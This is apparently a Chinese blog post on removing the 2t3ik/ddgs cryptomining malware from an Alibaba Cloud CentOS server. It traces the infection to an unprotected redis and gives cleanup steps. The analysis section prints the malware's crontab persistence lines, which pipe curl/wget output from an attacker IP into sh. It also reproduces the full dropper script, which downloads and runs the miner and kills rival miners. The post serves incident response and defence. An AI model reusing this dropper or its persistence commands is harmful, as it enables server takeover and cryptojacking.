本文主要是介绍阿里云centos上处理2t3ik与ddgs病毒,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
阿里云centos上处理2t3ik与ddgs病毒
有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示
系统centos
由于我是新手,点了半天也没有免费的修复的按钮,而且升级企业版才可以查看,穷屌丝一个,升级企业版是不可能得到……
于是我就没有管它。
今天有时间登陆阿里云服务器看看什么情况,使用xshell连接,输入命令时候一卡一卡的,我还以为是xshell的问题呢,于是我还了putty登陆,还是一样,输入一个字母都卡半天,这就表明不是xshell的问题了,耐着性子输入top命令以查看,有个2t3ik.p的进程占用着99%多的CPU使用率,我赶紧把这个进程杀了,嗯,这下用着不卡了。
可是还没有等到半分钟,又开始一卡一卡的,继续使用top命令一看,还是这个2t3ik.p,只不过换了个PID
我也不知道这个进程是干什么的,可是不管这个是什么作用的进程让我的服务器卡顿我都要杀掉,于是我就百度搜索了这个进程,遗憾的是在百度上2t3ik.p这个关键字搜不到什么相关的信息
百度不行那我上阿里云官网看看有什么解决的办法,很遗憾,找不到,那我就谷歌吧,说起来还是谷歌好,虽然相关结果不多,也是让我找到线索处理这个2t3ik.p进程了,这个进程文件在/tmp目录下
于是把这个2t3ik.p文件删除,可是没过过一分钟又出现了这个文件,阿里云的管理台上提示出现异常文件文件下载
然后我吧这个文件删除掉,在新建一个2t3ik.p文件,不给权限,2t3ik.p进程是没有了,却又出现2t3ik.m这个进程
在/tmp文件夹下有2t3ik.m这个文件
想到过给/tmp文件夹添加不可修改的权限,觉得不大现实,因为以后这个文件夹会用到
那么把所有让所有以2t3ik开头的文件不给修改权限
使用命令
chattr +i 2t3ik*
chattr +i ddgs*
搞定,再也没有2t3ik的进程了
再也没有恼人的2t3ik病毒了
PS:阿里云的aliyundun真的不管用,对这个进程竟然防不了
PPS:阿里云对异常处理竟然还要升级企业版才能查看与一键处理,我一介屌丝哪来这个闲钱去升级啊
2t3ik与ddgs挖矿病毒处理
一、问题现象
朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。
二、分析处理
即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:
- */5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
- */5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:
- export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
- echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
- echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
- mkdir -p /var/spool/cron/crontabs
- echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
- echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
- if [ ! -f "/tmp/ddgs.3011" ]; then
- curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
- fi
- chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
- ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
简单的一个shell 脚本,前面是创建crontab定时任务,后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。
删除crontab内容,并kill 掉相关进程后,观察一段时间发现其不再重新出现。问题解决。当然,为避免其后面再出现,可以做以下预防操作:
- cd /tmp/
- rm -rf 2t3ik.p
- rm -rf ddgs.3011
- touch 2t3ik.p
- touch ddgs.3011
- chattr +i 2t3ik*
- chattr +i ddgs*
三、产生原因
网上也找了下该病毒的相关信息,了解到其一般是由于安装了redis后,未设置密码或密码太过简单,导致的被入侵。redis密码修改方法如下:
- redis-cli -h 127.0.0.1 -p 6379
- config get requirepass //获取当前密码
- config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认,即无密码;
永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:
- requirepass yourpassword //此处注意,行前不能有空格
另外,平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具,定期做扫描。
这篇关于阿里云centos上处理2t3ik与ddgs病毒的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!